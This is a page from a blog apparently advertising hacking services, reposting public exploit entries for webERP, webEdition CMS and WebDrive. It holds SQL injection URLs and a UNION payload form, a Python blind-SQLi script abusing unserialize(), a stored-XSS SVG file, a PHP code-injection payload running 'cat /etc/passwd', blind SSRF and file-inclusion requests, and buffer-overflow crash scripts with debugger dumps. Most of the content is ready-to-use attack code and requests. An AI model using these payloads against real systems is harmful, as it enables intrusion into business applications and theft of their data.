Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153231

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/50713/info
 
webERP is prone to information-disclosure, SQL-injection, and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 
An attacker may exploit the information-disclosure issue to gain access to sensitive information that may lead to further attacks.
 
An attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 
webERP 4.0.5 is vulnerable; prior versions may also be affected. 

http://www.example.com/reportwriter/ReportMaker.php?action=go&reportid=SQL_CODE_HERE
HireHackking 
source: https://www.securityfocus.com/bid/50713/info
  
webERP is prone to information-disclosure, SQL-injection, and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
  
An attacker may exploit the information-disclosure issue to gain access to sensitive information that may lead to further attacks.
  
An attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  
webERP 4.0.5 is vulnerable; prior versions may also be affected. 

<form action="http://www.example.com/reportwriter/FormMaker.php" method="post">
<input type="hidden" name="ReportID" value="1 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20">
<input type="hidden" name="FormID" value="[FormID]" />
<input type="hidden" name="todo" value="Criteria Setup" />
<input type="submit" value="submit" id="btn">
</form>
HireHackking 
# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
# Date: 2020-05-01
# Author: Besim ALTINOK
# Vendor Homepage: http://www.weberp.org
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15.1
# Tested on: Xampp
# Credit: İsmail BOZKURT

--------------------------------------------------------------------------
About Software:

webERP is a complete web-based accounting and business management system
that requires only a web-browser and pdf reader to use. It has a wide range
of features suitable for many businesses particularly distributed
businesses in wholesale, distribution, and manufacturing.

-------------------------------------------------------
PoC Unauthenticated Backup File Access
---------------------------------------------

1- This file generates new Backup File:
http://localhost/webERP/BackUpDatabase.php
2- Someone can download the backup file from:
-- 
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz
HireHackking

WebERP 4.15 - SQL injection 

# Exploit Title: Blind SQL injection in WebERP.
# Date: June 10, 2019
# Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/)
# Vendor Homepage: http://www.weberp.org/
# Version: 4.15

# A malicious query can be sent in base64 encoding to unserialize() function. It can be deserialized as an array without any sanitization then. 
# After it, each element of the array is passed directly to the SQL query. 

import requests
import base64
import os
import subprocess
from bs4 import BeautifulSoup
import re
import time
import sys

def generatePayload(PaidAmount="0",PaymentId="0"):
    #THIS FUNCTION IS INSECURE BY DESIGN
    ToSerialize = r"[\"%s\" => \"%s\"]" % (PaymentId, PaidAmount)
    return os.popen("php -r \"echo base64_encode(serialize(" + ToSerialize + "));\"").read()

def getCookies(ip, CompanyNameField, usr, pwd):
    r = requests.get("http://" + ip + "/index.php")
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]
    
    data = {"FormID":FormID,"CompanyNameField":CompanyNameField,"UserNameEntryField":usr,"Password":pwd,"SubmitUser":"Login"}
    r = requests.post("http://" + ip + "/index.php", data)
    
    return {"PHPSESSIDwebERPteam":r.headers["Set-Cookie"][20:46]}
    

def addSupplierID(name, cookies, proxies):
    r = requests.get("http://" + ip + "/Suppliers.php", cookies=cookies)
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]
    
    data = {"FormID":FormID,"New":"Yes","SupplierID":name,"SuppName":name,"SupplierType":"1","SupplierSince":"01/06/2019","BankPartics":"","BankRef":"0",
            "PaymentTerms":"20","FactorID":"0","TaxRef":"","CurrCode":"USD","Remittance":"0","TaxGroup":"1","submit":"Insert+New+Supplier"}
            
    requests.post("http://" + ip + "/Suppliers.php", data=data,cookies=cookies,proxies=proxies)


def runExploit(cookies, supplier_id, payload, proxies):
    r = requests.get("http://" + ip + "/Payments.php", cookies=cookies)
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]
    
    data = {"FormID":FormID,
            "CommitBatch":"2",
            "BankAccount":"1",
            "DatePaid":"01/06/2019",
            "PaidArray":payload}
         
    requests.post("http://" + ip + "/Payments.php?identifier=1559385755&SupplierID=" + supplier_id, data=data,cookies=cookies,proxies=proxies)


if __name__ == "__main__":
    #proxies = {'http':'127.0.0.1:8080'}
    proxies = {}
    
    if len(sys.argv) != 6:
        print '(+) usage: %s <target> <path> <login> <password> <order>' % sys.argv[0]
        print '(+) eg: %s 127.0.0.1 "weberp/webERP/" admin weberp 1' % sys.argv[0]
        print 'Order means the number of company on the website. Can be gathered from the login page and usually equals 0 or 1'
        exit()
    
    ip = sys.argv[1] + "/" + sys.argv[2]
    
    #if don't have php, set Payload to the next one to check this time-based SQLi: YToxOntpOjA7czoyMzoiMCB3aGVyZSBzbGVlcCgxKT0xOy0tIC0iO30=
    #payload = generatePayload("0 where sleep(1)=1;-- -", "0")
    
    payload = generatePayload("0", "' or sleep(5) and '1'='1")
    
    #get cookies
    cookies = getCookies(ip, sys.argv[5], sys.argv[3], sys.argv[4])
    
    addSupplierID("GARUMPAGE", cookies, proxies)
    
    t1 = time.time()
    runExploit(cookies, "GARUMPAGE", payload, proxies)
    t2 = time.time()
    
    if (t2-t1>4):
        print "Blind sqli is confirmed"
    else:
        print "Verify input data and try again"
HireHackking 
Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS
Application: Webedition CMS
Version: v2.9.8.8   
Bugs:  Stored Xss
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 03.08.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps
1. Login to account
2. Go to New ->  Media -> Image
3. Upload malicious svg file 
svg file content:

"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
"""


Poc request:

POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1
Host: localhost
Content-Length: 761
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
Connection: close

we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1
HireHackking 
Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Application: webedition Cms
Version: v2.9.8.8   
Bugs:  RCE
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 03.08.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps
1. Login account
2. Go to New -> Webedition page -> empty page
3. Select php
4. Set as "><?php echo system("cat /etc/passwd");?>  Description area

Poc request: 

POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1
Host: localhost
Content-Length: 1621
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
Connection: close

we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1
HireHackking 
Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF
Application: Webedition CMS
Version: v2.9.8.8   
Bugs:  Blind SSRF
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 07.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
write https://youserver/test.xml to we_cmd[0] parameter

poc request

POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
Host: localhost
Content-Length: 141
sec-ch-ua: 
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300
Connection: close

we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3
HireHackking 
source: https://www.securityfocus.com/bid/47065/info

webEdition CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view and execute arbitrary local files in the context of the webserver process. This may aid in further attacks.

webEdition CMS 6.1.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/webEdition/index.php?DOCUMENT_ROOT= [lfi]%00
http://www.example.com/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]%00
HireHackking 
source: https://www.securityfocus.com/bid/67689/info

webEdition CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

webEdition CMS 6.3.3.0 through 6.3.8.0 svn6985 are vulnerable; other versions may also be affected. 

 http://www.example.com/webEdition/we_fs.php?what=4[SQL]
HireHackking 
#Exploit Title: WebDrive 18.00.5057 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-10-31
#Vendor Homepage: https://webdrive.com/
#Software Link: https://webdrive.com/download/
#Tested Version: 18.00.5057
#Tested on: Windows 10 Single Language x64

#Steps to produce the crash:
#1.- Run python code: WebDrive_18.00.5057.py
#2.- Open string.txt and copy content to clipboard
#2.- Open WebDrive
#3.- Select "New"
#4.- Select "Secure WebDAV" and click on "Siguiente"
#6.- Select "Url / Address" and Put "1.1.1.1" 
#7.- Select "Username" and Paste ClipBoard
#8.- Select "Password" and Put "1234"
#9.- Click on "Test Connection"
#10.- Crashed

cod = "\x41" * 5000

f = open('string.txt', 'w')
f.write(cod)
f.close()
HireHackking 
#!/usr/bin/python
#Exploit Title:WebDrive Buffer OverFlow PoC
#Author: metacom
#Vendor Homepage: http://www.webdrive.com/products/webdrive/
#Software Link: https://www.webdrive.com/products/webdrive/download/
#Version: 12.2 (build # 4172) 32 bit
#Date found:     31.05.2015
#Date published: 31.05.2015
#Platform: Windows 7 Ultimate
#Bug: Multiple Buffer Overflow UNICODE
'''
----------------------------------------------------------------------------
Summary:
Unlike a typical FTP client, WebDrive allows you to open and 
edit server-based, files without the additional step of downloading the file. 
Using a simple wizard, you assign a network drive letter to the FTP Server. 
WebDrive supports additional protocols such as WebDAV, SFTP and Amazon S3 and 
maps a drive letter to each of these servers.You can map unique drive letters
to multiple servers.Download the full-function 20-day trial of WebDrive and 
make file management on remote servers easier and more efficient!
------------------------------------------------------------------------------
WebDrive connects to many types of web servers, 
as well as servers in the cloud.You can use WebDrive 
to access your files on all of the following server 
types and protocols:

WebDAV ------------>Vulnerable
WebDAV over SSL---->Vulnerable
FTP---------------->Vulnerable
FTP over SSL------->Vulnerable
Amazon S3---------->Vulnerable
SFTP--------------->Vulnerable
FrontPage Server--->Vulnerable

------------------------------------------------------------------------------
How to Crash:

Copy the AAAA...string from WebDrive.txt to clipboard, create a connection 
and paste it in the URL/Address and attempt to connect.


WebDAV
============================
Crash Analysis using WinDBG:
============================
(430.9f8): Access violation - code c0000005 (!!! second chance !!!)
eax=001cad5c ebx=02283af8 ecx=00000041 edx=02289d9c esi=fdf47264 edi=001cad5c
eip=0055ff2b esp=001c8cfc ebp=001c8d00 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
webdrive+0x30ff2b:
0055ff2b 66890c16        mov     word ptr [esi+edx],cx    ds:0023:001d1000=????
0:000> !exchain
001c8d20: webdrive+35a24e (005aa24e)
001cb768: webdrive+1c0041 (00410041)
Invalid exception stack at 00410041
0:000> d 001cb768
001cb768  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb778  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb788  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb798  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7a8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7b8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7c8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7d8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

WebDAV over SSL
============================
Crash Analysis using WinDBG:
============================
(b88.ca0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000
eip=00410041 esp=000a1238 ebp=000a1258 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\ipworks9.dll - 
ipworks9!IPWorks_SNPP_Get+0x57f:
00410041 038d4df0e8da    add     ecx,dword ptr [ebp-25170FB3h] ss:0023:daf302a5=????????
0:000>!exchain
Invalid exception stack at 00410041

FTP and FTP over SSL
============================
Crash Analysis using WinDBG:
============================
(834.70c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000
eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
002d8c1c: webdrive+35a24e (015da24e)
002db664: 00410041
Invalid exception stack at 00410041

Amazon S3
============================
Crash Analysis using WinDBG:
============================
(a64.a98): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002f8550 edi=00000000
eip=775e64f4 esp=002f84e8 ebp=002f853c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
002f8c7c: webdrive+35a24e (015da24e)
002fb6c4: 00410041
Invalid exception stack at 00410041

SFTP
============================
Crash Analysis using WinDBG:
============================
(848.9a8): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002380f8 edi=00000000
eip=775e64f4 esp=00238090 ebp=002380e4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
00238824: webdrive+35a24e (015da24e)
0023b26c: 00410041
Invalid exception stack at 00410041

FrontPage Server
============================
Crash Analysis using WinDBG:
============================
(cd4.710): Access violation - code c0000005 (!!! second chance !!!)
eax=007ba9f0 ebx=05d29738 ecx=00000041 edx=05d2fd48 esi=faa912b8 edi=007ba9f0
eip=003bff2b esp=007b8990 ebp=007b8994 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
webdrive+0x30ff2b:
003bff2b 66890c16        mov     word ptr [esi+edx],cx    ds:0023:007c1000=????
0:000> !exchain
007b89b4: webdrive+35a24e (0040a24e)
007bb3fc: webdrive+360041 (00410041)
Invalid exception stack at 00410041

'''

#Proof of Concept:

buffer="http://"
buffer+="\x41" * 70000
off=buffer

try:
	out_file = open("WebDrive.txt",'w')
	out_file.write(off)
	out_file.close()
	print("[*] Malicious txt file created successfully")
except:
	print "[!] Error creating file"
HireHackking 
Document Title:
===============
WebDrive 12.2 (B4172) - Buffer Overflow Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1500


Release Date:
=============
2015-06-01


Vulnerability Laboratory ID (VL-ID):
====================================
1500


Common Vulnerability Scoring System:
====================================
6.8


Product & Service Introduction:
===============================
Unlike a typical FTP client, WebDrive allows you to open and edit server-based, files without the additional step of downloading the file. 
Using a simple wizard, you assign a network drive letter to the FTP Server. WebDrive supports additional protocols such as WebDAV, SFTP and 
Amazon S3 and maps a drive letter to each of these servers.You can map unique drive letters to multiple servers.Download the 
full-function 20-day trial of WebDrive and  make file management on remote servers easier and more efficient!

(Copy of the Vendor Homepage: http://www.webdrive.com/products/webdrive/ )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered an unicode buffer overflow vulnerability in the official WebDrive v12.2 (Build 4172) 32 bit software.


Vulnerability Disclosure Timeline:
==================================
2015-06-01: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
South River Technologies
Product: WebDrive - Software 12.2 (Build 4172) 32 bit


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A buffer overflow software vulnerability has been discovered  in the official WebDrive v12.2 (Build 4172) 32 bit software.
The buffer overflow vulnerability allows to include unicode strings to basic code inputs from a system user account to compromise the software process or system.

A fail to sanitize the input of the URL/Address results in compromise of the software system process. Attackers are able to 
include large unicode strings to overwrite the registers like eip, ebp and co. WebDrive connects to many types of web servers, 
as well as servers in the cloud. You can use WebDrive to access your files on all of the following server types and protocols:

WebDAV ------------>Vulnerable
WebDAV over SSL---->Vulnerable
FTP---------------->Vulnerable
FTP over SSL------->Vulnerable
Amazon S3---------->Vulnerable
SFTP--------------->Vulnerable
FrontPage Server--->Vulnerable

The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.8. 
Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the vulnerability 
results in system compromise by elevation of privileges via overwrite of the registers.

Vulnerable Module(s):
						[+] URL/Address

Note: Unlike a typical FTP client, WebDrive allows you to open and edit server-based, files without the additional step of downloading the file. 
Using a simple wizard, you assign a network drive letter to the FTP Server. WebDrive supports additional protocols such as WebDAV, SFTP and Amazon S3 and 
maps a drive letter to each of these servers.You can map unique drive letters to multiple servers. Download the full-function 20-day trial of WebDrive and 
make file management on remote servers easier and more efficient!


Proof of Concept (PoC):
=======================
The buffer overflow web vulnerability can be exploited by local attackers with low privilege system user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Copy the AAAA...string from WebDrive.txt to clipboard
2. Create a connection 
3. Paste it in the URL/Address and attempt to connect.


--- Crash Analysis using WinDBG: [WebDAV] ---
(430.9f8): Access violation - code c0000005 (!!! second chance !!!)
eax=001cad5c ebx=02283af8 ecx=00000041 edx=02289d9c esi=fdf47264 edi=001cad5c
eip=0055ff2b esp=001c8cfc ebp=001c8d00 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
webdrive+0x30ff2b:
0055ff2b 66890c16        mov     word ptr [esi+edx],cx    ds:0023:001d1000=????
0:000> !exchain
001c8d20: webdrive+35a24e (005aa24e)
001cb768: webdrive+1c0041 (00410041)
Invalid exception stack at 00410041
0:000> d 001cb768
001cb768  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb778  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb788  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb798  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7a8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7b8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7c8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7d8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

WebDAV over SSL
============================
Crash Analysis using WinDBG:
============================
(b88.ca0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000
eip=00410041 esp=000a1238 ebp=000a1258 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\ipworks9.dll - 
ipworks9!IPWorks_SNPP_Get+0x57f:
00410041 038d4df0e8da    add     ecx,dword ptr [ebp-25170FB3h] ss:0023:daf302a5=????????
0:000>!exchain
Invalid exception stack at 00410041

FTP and FTP over SSL
============================
Crash Analysis using WinDBG:
============================
(834.70c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000
eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
002d8c1c: webdrive+35a24e (015da24e)
002db664: 00410041
Invalid exception stack at 00410041

Amazon S3
============================
Crash Analysis using WinDBG:
============================
(a64.a98): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002f8550 edi=00000000
eip=775e64f4 esp=002f84e8 ebp=002f853c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
002f8c7c: webdrive+35a24e (015da24e)
002fb6c4: 00410041
Invalid exception stack at 00410041

SFTP
============================
Crash Analysis using WinDBG:
============================
(848.9a8): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002380f8 edi=00000000
eip=775e64f4 esp=00238090 ebp=002380e4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
00238824: webdrive+35a24e (015da24e)
0023b26c: 00410041
Invalid exception stack at 00410041

FrontPage Server
============================
Crash Analysis using WinDBG:
============================
(cd4.710): Access violation - code c0000005 (!!! second chance !!!)
eax=007ba9f0 ebx=05d29738 ecx=00000041 edx=05d2fd48 esi=faa912b8 edi=007ba9f0
eip=003bff2b esp=007b8990 ebp=007b8994 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
webdrive+0x30ff2b:
003bff2b 66890c16        mov     word ptr [esi+edx],cx    ds:0023:007c1000=????
0:000> !exchain
007b89b4: webdrive+35a24e (0040a24e)
007bb3fc: webdrive+360041 (00410041)
Invalid exception stack at 00410041
'''


PoC: Exploitcode
